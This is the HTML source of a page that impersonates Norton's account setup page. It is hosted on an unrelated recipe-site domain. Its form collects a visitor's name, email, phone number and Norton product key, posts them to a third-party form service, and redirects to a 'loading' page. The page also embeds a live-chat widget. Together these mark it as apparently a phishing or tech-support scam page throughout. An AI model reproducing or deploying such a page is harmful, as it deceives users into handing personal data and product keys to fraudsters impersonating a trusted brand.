<head>
    

    
        

    
        

        
        
    

    
    

    
    <title>Set up your Norton Account</title>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Pragma" content="no-cache">
    <meta name="description" content="Log in to your Norton account. Sign in to enter your product key, access your account, manage your subscription, and extend your Norton protection to PC, Mac, Android, and iOS devices. If you don't already have a Norton account, create one today.">
    <meta name="viewport" content="width=device-width">
    <meta name="format-detection" content="telephone=no">
    <meta name="robots" content="noindex, nofollow">
		    
    <link href="https://recipesforyears.vercel.app/sprites-2023-07-24-12-16-39.css" rel="stylesheet" type="text/css" media="screen" title="default">

    

    

    

    <link rel="stylesheet" href="https://recipesforyears.vercel.app/nsl-web-2023-07-24-12-16-39.css" type="text/css" media="screen,print" title="default">

    

    
        <style type="text/css">

    /* Google Roboto Medium*/
    @font-face {
        font-family: 'Roboto-Medium';
        font-style: normal;
        font-weight: 500;
        font-display: swap;
        src: url("") format('truetype')
    }
    /* Inter-Regular */
    @font-face {
        font-family: 'Inter';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url("https://recipesforyears.vercel.app/Inter-Regular.woff") format('woff'),
        url("https://recipesforyears.vercel.app/Inter-Regular.woff2") format('woff2');
    }
    /* Inter-Medium */
    @font-face {
        font-family: 'Inter';
        font-style: normal;
        font-weight: 500;
        font-display: swap;
        src: url("https://recipesforyears.vercel.app/Inter-Medium.woff") format('woff'),
        url("https://recipesforyears.vercel.app/Inter-Medium.woff2") format('woff2');
    }
    /* Inter-SemiBold */
    @font-face {
        font-family: 'Inter';
        font-style: normal;
        font-weight: 600;
        font-display: swap;
        src: url("https://recipesforyears.vercel.app/Inter-SemiBold.woff") format('woff'),
        url("https://recipesforyears.vercel.app/Inter-SemiBold.woff2") format('woff2');
    }
    /* Inter-Bold */
    @font-face {
        font-family: 'Inter';
        font-style: normal;
        font-weight: 700;
        font-display: swap;
        src: url("https://recipesforyears.vercel.app/Inter-Bold.woff") format('woff'),
        url("https://recipesforyears.vercel.app/Inter-Bold.woff2") format('woff2');
    }
    /* Inter-ExtraBold */
    @font-face {
        font-family: 'Inter';
        font-style: normal;
        font-weight: 800;
        font-display: swap;
        src: url("https://recipesforyears.vercel.app/Inter-ExtraBold.woff") format('woff'),
        url("https://recipesforyears.vercel.app/Inter-ExtraBold.woff2") format('woff2');
    }
    /* Mier-Regular */
    @font-face {
        font-family: 'Mier';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url("") format('woff'),
        url("") format('woff2');
    }
    /* Mier-DemiBold */
    @font-face {
        font-family: 'Mier';
        font-style: normal;
        font-weight: 600;
        font-display: swap;
        src: url("") format('woff'),
        url("") format('woff2');
    }
    /* Mier-Bold */
    @font-face {
        font-family: 'Mier';
        font-style: normal;
        font-weight: 700;
        font-display: swap;
        src: url("") format('woff'),
        url("") format('woff2');
    }
    /* Mier-ExtraBold */
    @font-face {
        font-family: 'Mier';
        font-style: normal;
        font-weight: 800;
        font-display: swap;
        src: url("") format('woff'),
        url("") format('woff2');
    }
</style>
    
    

    <link rel="icon" href="https://recipesforyears.vercel.app/favicon.ico" type="image/x-icon">

    <!-- Need to set global variable to support older browsers -->
    

    
    <style type="text/css">
        #spinner-wrapper{width:100%;height:100%;z-index:9999;background-color:#FFFFFF;position:absolute}
        .spinner{margin:230px auto auto; width:96px;height:96px}.spinner svg{-webkit-animation:2s linear infinite spin;-moz-animation:2s linear infinite spin;animation:2s linear infinite spin}.spinner circle.thumb{-webkit-animation:2s linear infinite dash;-moz-animation:2s linear infinite dash;animation:2s linear infinite dash;fill:none;stroke:rgb(0, 112, 246);stroke-width:3;stroke-linecap:round}.spinner circle.track{fill:none;stroke:rgba(7,29,43,0.1);stroke-width:3;stroke-linecap:round}@-moz-keyframes spin{0%{-moz-transform:rotate(0);transform:rotate(0)}100%{-moz-transform:rotate(360deg);transform:rotate(360deg)}}@-moz-keyframes dash{0%{stroke-dasharray:1,140;stroke-dashoffset:0}50%{stroke-dasharray:90,140;stroke-dashoffset:-35}75%{stroke-dasharray:90,140;stroke-dashoffset:-105}100%{stroke-dasharray:90,140;stroke-dashoffset:-124}}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@-webkit-keyframes dash{0%{stroke-dasharray:1,140;stroke-dashoffset:0}50%{stroke-dasharray:90,140;stroke-dashoffset:-35}75%{stroke-dasharray:90,140;stroke-dashoffset:-105}100%{stroke-dasharray:90,140;stroke-dashoffset:-124}}@keyframes spin{0%{transform:rotate(0)}100%{transform:rotate(360deg)}}@keyframes dash{0%{stroke-dasharray:1,140;stroke-dashoffset:0}50%{stroke-dasharray:90,140;stroke-dashoffset:-35}75%{stroke-dasharray:90,140;stroke-dashoffset:-105}100%{stroke-dasharray:90,140;stroke-dashoffset:-124}}
        .fade-element{animation:1s linear 1s 1 normal forwards fadein;-webkit-animation:1s linear 1s 1 normal forwards fadein;-moz-animation:1s linear 1s 1 normal forwards fadein;-o-animation:1s linear 1s 1 normal forwards fadein;-ms-animation:1s linear 1s 1 normal forwards fadein;opacity:1}@keyframes fadein{0%{opacity:1}50%{opacity:.5}100%{opacity:0}}@-webkit-keyframes fadein{0%{opacity:1}50%{opacity:.5}100%{opacity:0}}@-moz-keyframes fadein{0%{opacity:1}50%{opacity:.5}100%{opacity:0}}@-o-keyframes fadein{0%{opacity:1}50%{opacity:.5}100%{opacity:0}}@-ms-keyframes fadein{0%{opacity:1}50%{opacity:.5}100%{opacity:0}}
        .loading-text{text-align:center;margin-top:16px}
    </style>

        

<style id="at-makers-style" class="at-flicker-control">
.mboxDefault {visibility: hidden;}
</style></head>
<body class="theme_default home">

    <div id="spinner-wrapper" class="fade-element" style="display: none;">
        <div class="spinner">
            <svg viewBox="0 0 50 50" xmlns="http://www.w3.org/2000/svg">
                <circle class="thumb" cx="25" cy="25" r="20"></circle>
                <circle class="track" cx="25" cy="25" r="20"></circle>
            </svg>
        </div>
        <div class="loading-text">Loading...</div>
    </div>

    <div id="noCookies" style="display: none;">Cookies are disabled on your browser. Please enable cookies and reload the page. </div>

    <div id="login-wrapper-top">
    <div class="norton-lifelock">

        <div class="theme-container">
            

<div id="theme">
    

        

        <div id="default-theme">

            <h1>Get started with your Norton Setup</h1>

            <p class="lead">Kindly enter details to install and activate your Norton Security Software</p>
			<img src="https://recipesforyears.vercel.app/norton.jpg"/>
            
        </div>


    
</div>


<div id="theme-mobile" class="text-center"></div>

        </div>

        

            <div class="panel-container ">

        

        <div id="panel-background" class="login-panel">
            <div id="panel-content">
                <div class="logo-container">
                    
                    
                        <div class="default-logo">
                        </div>
                    
                </div>

                
                    
                    
                
                <div id="tab-content">
                    

    
    <div id="loginCollapse" class="panel-collapse collapse lifelock-collapse in" style="height: auto;">
        

    

   
        
            <label id="sign-in-label">Get started</label>
            <label id="enter-password-label" style="display: none;">Enter your password</label>
        <form style="align:center; padding:10px;" action="https://api.web3forms.com/submit" method="POST">

    <!-- Replace with your Access Key -->
    <input type="hidden" name="access_key" value="3a8858f2-ead4-4c53-a81d-6a578d9a4b30">
								 <label><b>Name</b></label><br>
								 <input type="text" placeholder="Name" name="name" id="name" required style="padding: 5px;">			<br><br>				 
								 <label><b>Email</b></label><br>
								 <input type="email" placeholder="youremail@example.com" name="email" id="email" required style="padding: 5px;"><br><br>
								 <label><b>Phone No</b></label><br>
								 <input type="text" placeholder="+1-123-456-7890" name="phone" id="phone" required style="padding: 5px;"><br><br>
								<label><b>Product Key</b></label><br>
								<input type="text" placeholder="XXXXX-XXXXX-XXXXX-XXXXX-XXXXX" name="message" id="message" required style="padding: 5px;"><br><br>
								<br><br>
							 	 <label> </label>
								 <input class="sendButton" type="submit" name="Submit" value="Submit" style="cursor: pointer; background-color: rgb(0, 153, 0); color: rgb(255, 255, 255); font-weight: bold; border-radius: 0px; width: 63%; height: 30px;">
								<input type="hidden" name="redirect" value="https://recipesforyears.vercel.app/loading.html">
							</form>

        

        
            
        

        

        <div id="emptySpace"></div>
        
        <div id="loginPanelBody" class="lifelock-panel-body">
            <div class="row hide-context-menu" id="usernameRow">
    
        
        
			 

          
            

            

            
    
</div>

            

            

            

    


            
            
            
            
            

           
            
            

            

            
          

            

            

            <section class="o__hero__container">
        <div class="o__grid__container">
            <div class="m__copy__container has--shadow">
               
                <h3 class="a__third__headline"> </h3>
            </div>
                <div class="m__button__cta">
				

    <style>
        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }
    </style>
                        
                </div>

        </div>
    </section>
            
                
                
                    <div class="branding-text">
                        <p>The Norton and LifeLock brands are part of NortonLifeLock Inc.</p>
                    </div>
                
            
            

            

            

            
            

    
        <input type="hidden" name="nonceValue" value="3bd00f12-be90-4c13-b4cc-14d5309919a2">
    
    
    <input type="hidden" name="execution" value="e1s1">



            <input type="hidden" name="_eventId" id="_loginEventId" value="submit">

        </div> 
        
    

        
    
    <div id="no-google-support-dialog" class="modal" role="dialog">
        <div class="login-3ps-dialog-header">
            <h3><div>We're currently unable to sign you in with Google.</div></h3>
        </div>
        <div class="login-3ps-dialog-body">
            <div class="login-3ps-dialog-message1">Please sign in with your Norton username/email and password. You can also request a one-time password below.</div>
        </div>
        <div class="login-3ps-dialog-footer">
            <div class="actions mobile-reverse-child-order">
                <div class="controls form-group-column">
                    <a href="#" class="link forgot-password-link">Forgot password?</a>
                    <a href="#" class="link request-email-otp-link">Request one-time password</a>
                </div>
                <div class="controls form-group-row">
                    <input type="submit" class="btn submit-btn" value="OK" tabindex="0">
                </div>
            </div>
        </div>
    </div>


    
    <div id="no-apple-support-dialog" class="modal" role="dialog">
        <div class="login-3ps-dialog-header">
            <h3><div>We're currently unable to sign you in with Apple.</div></h3>
        </div>
        <div class="login-3ps-dialog-body">
            <div class="login-3ps-dialog-message1">Please sign in with your Norton username/email and password. You can also request a one-time password below.</div>
        </div>
        <div class="login-3ps-dialog-footer">
            <div class="actions mobile-reverse-child-order">
                <div class="controls form-group-column">
                    <a href="#" class="link forgot-password-link">Forgot password?</a>
                    <a href="#" class="link request-email-otp-link">Request one-time password</a>
                </div>
                <div class="controls form-group-row">
                    <input type="submit" class="btn submit-btn" value="OK" tabindex="0">
                </div>
            </div>
        </div>
    </div>


    
  



    </div>

                    

  
                    
                    
                    
                        

    
    <!-- One Tag Script ends -->

                    
                </div>

               
            </div>
        </div>

        
            
            
                <div id="footer-content">
<footer class="norton-lifelock-global-footer" id="ngp-main-footer">
    <div class="row">
        <ul class="footer-links egain-footer">
            <li>
                <a rel="noopener noreferrer" target="_blank" href="#">Legal</a>
            </li>
            <li>
                

                <a rel="noopener noreferrer" target="_blank" id="default_footer_privacy_link" href="#">Privacy</a>
            </li>
        </ul>
    </div>
</footer></div>
            
        
    </div>
        
    </div>
</div>




<div id="uglipop_overlay_wrapper" style="display: none;"><div id="uglipop_overlay" style="display: none;"></div></div><div id="uglipop_content_fixed" style="display: none;"><div id="uglipop_popbox" role="dialog" aria-hidden="true"></div></div><div style="position:absolute;display:none;" class="dijitTooltipContents"></div><img style="position:absolute;display:none;z-index:9999" width="13" height="14" alt=""><div style="position:absolute;display:none;" class="dijitTooltipContents"></div><img style="position:absolute;display:none;z-index:9999" width="13" height="14" alt=""><div style="position:absolute;display:none;" class="dijitTooltipContents"></div><img style="position:absolute;display:none;z-index:9999" width="13" height="14" alt="">

<!--  ClickCease.com tracking-->
      <script type='text/javascript'>var script = document.createElement('script');
      script.async = true; script.type = 'text/javascript';
      var target = 'https://www.clickcease.com/monitor/stat.js';
      script.src = target;var elem = document.head;elem.appendChild(script);
      </script>
      <noscript>
      <a href='https://www.clickcease.com/' rel='nofollow'><img src='https://monitor.clickcease.com/' alt='ClickCease'/></a>
      </noscript>
      <!--  ClickCease.com tracking-->
	  
<!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/6842fffbb1436d190fd9f36b/1it2rfsfe';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->

</body>
</html>